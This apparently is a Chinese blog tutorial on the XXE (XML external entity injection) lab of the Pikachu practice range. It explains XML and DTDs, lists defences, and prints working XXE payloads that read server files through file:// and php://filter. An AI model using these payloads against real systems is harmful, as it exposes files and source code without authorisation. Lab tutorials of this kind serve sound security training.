Pikachu系列——XXE

Pikachu靶场系列持续更新~

 
要像追剧追番一样追下去哦
 

实验九 —— XXE

XXE概述

xml外部实体注入
攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。xxe漏洞触发的点往往是可以上传xml文件的位置,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

危害
加载恶意外部xml文件
文件读取
命令执行
内网端口扫描
攻击内网网站
发起dos攻击等危害

XML概念
XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下:
XML ----- 被设计用来传输和存储数据
HTML ----- 被设计用来显示数据

XML结构

第一部分:XML声明部分
<?xml version="1.0"?>

第二部分:文档类型定义 DTD
<!DOCTYPE note[ 
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>

第三部分:文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

其中,DTD(文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部DTD。
① 内部申明DTD格式
<!DOCTYPE 根元素 [元素申明]>
② 外部引用DTD格式
<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">
③ 引用公共DTD格式
<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

XML中对数据的引用称为实体,实体中有一类叫外部实体,用来引入外部资源,有SYSTEM和PUBLIC两个关键字,表示实体来自本地计算机还是公共计算机,外部实体的引用可以借助各种伪协议,比如如下三种,具体的示例可以看下面的xxe靶场实验:
file:///path/file.ext
http://url
php://filter/read=convert.base64-encode/resource=conf.php

防御:
①禁用外部实体
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);
Python:
from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
②过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC。
 

实验环境

我用的是phpstudy集成环境,一键搭环境 (如果端口没被占用还是比较顺利的)

靶场:Pikachu靶场下载
浏览器一个

接下来:
–>把下载下来的pikachu文件夹放到web服务器根目录下
–>根据实际情况修改inc/config.inc.php里面的数据库连接配置(登录名和密码要与数据库相同)
–>访问http://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化,点击进行初始化安装!",点击即可完成安装。
 

XXE

先提交一个正常的 xml 数据

<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "test"> ]>
<name>&xxe;</name>

payload中 &xxe; 是用来将xxe这个实体进行调用,xxe实体成功在前端回显。
在这里插入图片描述
读取服务器/本地文件(事先创建一个文本文件)
在这里插入图片描述
提交下面这样的payload,利用file://协议就能看到服务器/主机上的文件内容
这个XXE的file://协议一开始我用的5.3版本(失败),后来换的5.4的php环境才成功

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///D://phpStudy//PHPTutorial//WWW//pikachu//xxe.txt"> ]>
<x>&xxe;</x>

在这里插入图片描述
利用php://协议的filter过滤器以base64格式读取服务器/本地文件

<?xml version = "1.0"?>  
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>   
<x>&xxe;/x>

在这里插入图片描述
GOT IT!

 
******************************************************
这一XXE模块先搞定了,关注收藏追更哦~

展开阅读全文
评论将由博主筛选后显示,对所有人可见 | 还能输入1000个字符

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 创作都市 设计师: CSDN官方博客
应支付0元
点击重新获取
扫码支付

支付成功即可阅读